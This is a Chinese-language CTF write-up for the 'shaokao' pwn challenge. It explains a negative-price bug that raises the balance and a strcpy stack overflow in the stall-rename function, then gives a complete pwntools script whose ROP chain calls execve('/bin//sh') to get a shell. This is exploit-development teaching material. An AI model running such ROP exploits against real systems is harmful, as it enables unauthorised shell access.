一.shaokao
1.checksec
2.ida
去ida调试前看了眼程序,尝试买摊位,发现钱不够
点进去啤酒那里
发现这里的钱有漏洞,可以直接输入负数,钱不减反增。
又发现这里有strcpy函数,推测这里有溢出。
发现了系统调用函数
3.分析
那就是先买下摊位,再去改名,通过名字来溢出,实现系统调用。
先用ROPgadget来查找gadget
4.exp.py
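# _*_ coding:utf-8 _*_
from pwn import *
from struct import pack

#p = remote("123.56.116.45","18860")
r = process("./shaokao")
context.log_level = "debug"

# Step 1: get enough money. The beer purchase takes the amount without a
# sign check, so paying a negative number increases the balance instead
# of decreasing it (see the writeup above).
r.sendlineafter(">", b"1")
r.sendlineafter("3. 勇闯天涯\n", b"1")
r.sendlineafter("?\n", b"-10000000")

# Step 2: buy the stall (menu 4), then rename it (menu 5). The new name is
# copied with strcpy into a fixed-size stack buffer, which is the overflow
# the chain below rides on.
r.sendlineafter(">", b"4")
r.sendlineafter(">", b"5")

# Gadget and data addresses found with ROPgadget. They are absolute
# (0x40xxxx), so the binary is presumably non-PIE / statically linked —
# confirm against the checksec output. The comment gives the instruction
# sequence each gadget executes.
POP_RSI     = 0x000000000040a67e  # pop rsi ; ret
POP_RAX     = 0x0000000000458827  # pop rax ; ret
POP_RDI     = 0x000000000040264f  # pop rdi ; ret
POP_RDX_RBX = 0x00000000004a404b  # pop rdx ; pop rbx ; ret
MOV_RSI_RAX = 0x000000000045af95  # mov qword ptr [rsi], rax ; ret
XOR_RAX     = 0x0000000000447339  # xor rax, rax ; ret
ADD_RAX_1   = 0x0000000000496710  # add rax, 1 ; ret
SYSCALL     = 0x0000000000402404  # syscall
SCRATCH     = 0x00000000004e60e0  # writable slot used to stage the string
PADDING     = 0x20 + 8            # 0x20 of buffer + 8 for saved rbp (per IDA; verify)

# The chain: store "/bin//sh" (exactly 8 bytes, so one qword) at SCRATCH,
# a zero qword right after it (NUL terminator and an empty pointer array),
# then syscall with rdi = SCRATCH, rsi = rdx = SCRATCH + 8 and rax = 59.
#
# Two fixes against the original listing: the first gadget address was a
# string ('0x...'), which struct.pack rejects, and '/bin//sh' was a str
# appended to a bytes payload, which is a TypeError on Python 3.
pay = b"a" * PADDING
pay += pack("<Q", POP_RSI)          # rsi = SCRATCH
pay += pack("<Q", SCRATCH)
pay += pack("<Q", POP_RAX)          # rax = "/bin//sh"
pay += b"/bin//sh"
pay += pack("<Q", MOV_RSI_RAX)      # [SCRATCH] = "/bin//sh"
pay += pack("<Q", POP_RSI)          # rsi = SCRATCH + 8
pay += pack("<Q", SCRATCH + 8)
pay += pack("<Q", XOR_RAX)          # rax = 0
pay += pack("<Q", MOV_RSI_RAX)      # [SCRATCH + 8] = 0
pay += pack("<Q", POP_RDI)          # rdi = SCRATCH
pay += pack("<Q", SCRATCH)
pay += pack("<Q", POP_RSI)          # rsi = SCRATCH + 8
pay += pack("<Q", SCRATCH + 8)
pay += pack("<Q", POP_RDX_RBX)      # rdx = SCRATCH + 8, rbx = filler
pay += pack("<Q", SCRATCH + 8)
pay += pack("<Q", 0x4141414141414141)
pay += pack("<Q", XOR_RAX)          # rax = 0
# The original listing spelt out 59 copies of the add-gadget, one per line.
pay += pack("<Q", ADD_RAX_1) * 59   # rax = 59
pay += pack("<Q", SYSCALL)

r.sendlineafter("烧烤摊儿已归你所有,请赐名:", pay)
r.interactive()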